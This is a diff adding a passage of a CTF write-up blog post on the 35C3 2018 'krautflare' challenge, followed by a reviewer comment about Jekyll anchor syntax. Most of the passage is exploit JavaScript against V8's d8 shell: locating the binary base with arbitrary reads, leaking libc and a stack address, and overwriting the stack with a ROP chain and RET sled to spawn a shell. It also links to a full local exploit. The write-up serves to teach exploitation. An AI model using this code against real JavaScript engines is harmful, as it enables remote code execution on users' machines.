_posts/2019-01-02-35c3ctf-2018-krautflare.md

```diff
@@ -0,0 +1,846 @@
+	for(var x = 0; x < 0x20000; x += 0x1000) {
+	if (arb_read(a - BigInt(x)) == 0x00010102464c457f) {
+		// console.log(x.toString(16));
+		return (a - BigInt(x));
+	}
+	}
+	throw "[FAIL] Could not find valid d8 base";
+}
+const D8_BASE = calc_d8_addr();
+if (arb_read(D8_BASE) != 0x00010102464c457f) {
+	throw "[FAIL] D8_BASE is unstable"
+}
+if (arb_read(D8_BASE + 0x606000n) != 0x89485ed18949ed31n) {
+	throw "[FAIL] Can't find correct R_X page from D8_BASE"
+}
+console.log("    + Obtained D8_BASE = " + D8_BASE.hex());
+```
+
+With `D8_BASE`, I could obtain `LIBC_BASE`:
+
+```js
+const libc_fputc = arb_read(D8_BASE + 0x115eb48n);
+const libc_printf = arb_read(D8_BASE + 0x115eb68n);
+const libc_puts = arb_read(D8_BASE + 0x115eb58n);
+const libc_base = libc_fputc - FPUTC_OFFSET;
+if ( libc_base + PRINTF_OFFSET != libc_printf ) {
+	throw "[FAIL] Unknown libc";
+}
+if ( libc_base + PUTS_OFFSET != libc_puts ) {
+	throw "[FAIL] libc is messing with me";
+}
+console.log("    + libc_base: " + libc_base.hex());
+```
+
+... and thus, we could leak a stack address:
+
+```js
+const libc_environ = libc_base + ENVIRON_OFFSET;
+const stack_leak = arb_read(libc_environ);
+```
+
+Now, the plan was clear (or so I thought): write a ROP chain, and
+trample over the stack backwards until we hit a RETsled, that jumps to
+our ROP chain. Then, we've got shell, and we've got the
+flag. Easy-peasy, right? Nope, so damn wrong.
+
+## Finally, shell! Or is it?
+
+At this point, I created a ROP chain for an `execve` shell, using
+[`ropper`](https://github.com/sashs/Ropper) on `d8`. I also added code
+to start trampling over the stack:
+
+```js
+let cur_pos = stack_leak - 8n * BigInt(ROPCHAIN.length);
+for (var i = 0 ; i < ROPCHAIN.length ; ++i) {
+	arb_write(cur_pos + 8n * BigInt(i), ROPCHAIN[i]);
+}
+for (var i = 0 ; i < TRAMPLE_MAX ; ++i) {
+	// console.log(i);
+	cur_pos -= 8n;
+	arb_write(cur_pos,
+		  RET
+		 );
+}
+```
+
+After spending tons of time in the debugger, I was finally able to
+figure out that setting `TRAMPLE_MAX` to 17 worked, and I finally got
+a shell!!! While this was a local shell on my own machine, I had been
+using the same binary as the server, so I thought: what could be so
+different? Of course, I was accounting for differences in offsets
+between server and my machine, but I couldn't be more wrong.
+
+On a side note: this exploit works with relatively high
+reliability. It fails once out of every 10~20 runs, but otherwise it
+works brilliantly. Also, I had switched over to a manually written ROP
+chain using libc. This version of the exploit can be found
+[here](https://www.jaybosamiya.com/blog/2019/01/02/krautflare/exploit_local.js).
+
+I used the [prettydiff
+minifier](https://github.com/prettydiff/prettydiff/) to minify my
+code, as the server accepted only one line, and sent it over. No
+shell. Just a stack smash. Now began the many _many_ hours of pain.
+
+<a name="hours-of-pain">
+## Hours of Pain!
+</a>
```

Comment:
Jekyll doesn't accept this syntax 😢 

However, you can link to it still using `#hours-of-pain` so that's probably fine.